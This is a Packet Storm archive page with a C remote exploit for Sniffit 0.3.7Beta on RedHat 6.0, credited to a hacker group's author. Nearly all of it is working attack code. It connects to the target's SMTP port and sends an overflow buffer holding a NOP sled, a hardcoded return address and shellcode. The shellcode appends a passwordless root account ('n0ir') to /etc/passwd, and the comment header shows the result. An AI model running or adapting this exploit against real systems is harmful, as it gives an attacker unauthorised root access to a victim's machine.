Sniffit 0.3.7Beta Remote Exploit - sniffit has to be running (-L mail) flag set for this to work. Tested on RedHat 6.0.
b573a5413280903555b0ee0798458bf852149647ac3a38ccab820bebcba4ba44/*
Sniffit 0.3.7Beta Remote Exploit
sniffit has to be running (-L mail) flag set for this to work.
bug discovery by http://www.s0ftpj.org
tested on RedHat 6.0
this will get you a root line in /etc/passwd
-->snip...
# tail -1 /etc/passwd
n0ir::0:0:mr. noir:/:/bin/sh
<--end...
greetz: gov-boi, CronoS, dustdvl, calaz, everyone at gsu-linux
exploit code by noir@gsu.linux.org.tr | noir@olympos.org
http://www.olympos.org
[RET]{NOP}[shellcode]
3 May 2000
*/
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/time.h>
unsigned char shellcode[]= {
0xeb, 0x03, 0x5f, 0xeb, 0x05, 0xe8, 0xf8, 0xff,
0xff, 0xff, 0x31, 0xdb, 0xb3, 0x35, 0x01, 0xfb,
0x30, 0xe4, 0x88, 0x63, 0x0b, 0x31, 0xc9, 0x66,
0xb9, 0x01, 0x04, 0x31, 0xd2, 0x66, 0xba, 0xa4,
0x01, 0x31, 0xc0, 0xb0, 0x05, 0xcd, 0x80, 0x89,
0xc3, 0x31, 0xc9, 0xb1, 0x5b, 0x01, 0xf9, 0x31,
0xd2, 0xb2, 0x1d, 0x31, 0xc0, 0xb0, 0x04, 0xcd,
0x80, 0x31, 0xc0, 0xb0, 0x01, 0xcd, 0x80, 0x2f,
0x65, 0x74, 0x63, 0x2f, 0x70, 0x61, 0x73, 0x73,
0x77, 0x64, 0x01, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x6e, 0x30, 0x69, 0x72, 0x3a,
0x3a, 0x30, 0x3a, 0x30, 0x3a, 0x6d, 0x72, 0x2e,
0x20, 0x6e, 0x6f, 0x69, 0x72, 0x3a, 0x2f, 0x3a,
0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20
};
int resolv(char *hname, struct in_addr *addr);
/*#define RET 0xaabbccdd marker lvalue*/
#define RET 0xbfff5ba3 /*RedHat 6.0 (hedwig)*/
#define NOP 0x90
int
main(int argc, char *argv[])
{
int fd;
int i, l;
int align = 11;
unsigned long eip = RET, addr = 0, offset = 0;
unsigned char ovf[812];
struct sockaddr_in servaddr;
if (argc < 2){
fprintf(stderr,"Sniffit Version 0.3.7 Beta Linux/x86 remote exploit\nby noir@olympos.org | noir@gsu.linux.org.tr\n");
fprintf(stderr,"Olympos Security Team http://www.olympos.org\n");
fprintf(stderr,"bug discovery by FuSyS of s0ftpj.org\n");
fprintf(stderr,"\nUsage: %s <serv> [offset]\n\n",argv[0]);
exit(0);
}
if( (fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0){
perror("socket");
exit(-1);
}
bzero(&servaddr, sizeof(servaddr));
servaddr.sin_family = AF_INET;
servaddr.sin_port = htons(25);
if(!resolv(argv[1], &servaddr.sin_addr)){
herror("gethostbyname");
exit(-1);
}
if(connect(fd, (struct sockaddr *) &servaddr, sizeof(servaddr)) < 0 ){
perror("connect");
exit(-1);
}
printf("Sniffit Version 0.3.7 Beta Linux/x86 remote exploit\nby noir@olympos.org | noir@gsu.linux.org.tr\n");
printf("Olympos Security Team http://www.olympos.org\n");
printf("bug discovery by FuSyS of s0ftpj.org\n");
if(argv[2])
offset = atoi(argv[2]);
addr = eip + offset;
memset(ovf, NOP, sizeof(ovf));
for( i = 0 ; i < align; i++) ovf[i] = 0x41;
for( i = align; i < strlen(ovf) ; i+=4)
*((long *) &ovf[i]) = addr;
for( i = 230; i < strlen(ovf); i++) ovf[i] = 0x90;
for( i = 603, l = 0; l < strlen(shellcode); i++, l++)
ovf[i] = shellcode[l];
printf("eip: 0x%lx\n", addr);
memcpy(ovf, "mail from:",10);
write(fd, ovf, strlen(ovf));
write(fd, "\r\n\n", 3);
return 0;
}
int
resolv(char *hname, struct in_addr *addr)
{
struct hostent *hp;
if(inet_aton(hname, addr))
return 1;
if ( (hp = gethostbyname(hname)) == NULL)
return 0;
memcpy((struct in_addr *)addr, (char *)hp->h_addr, sizeof(struct in_addr));
return 1;
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed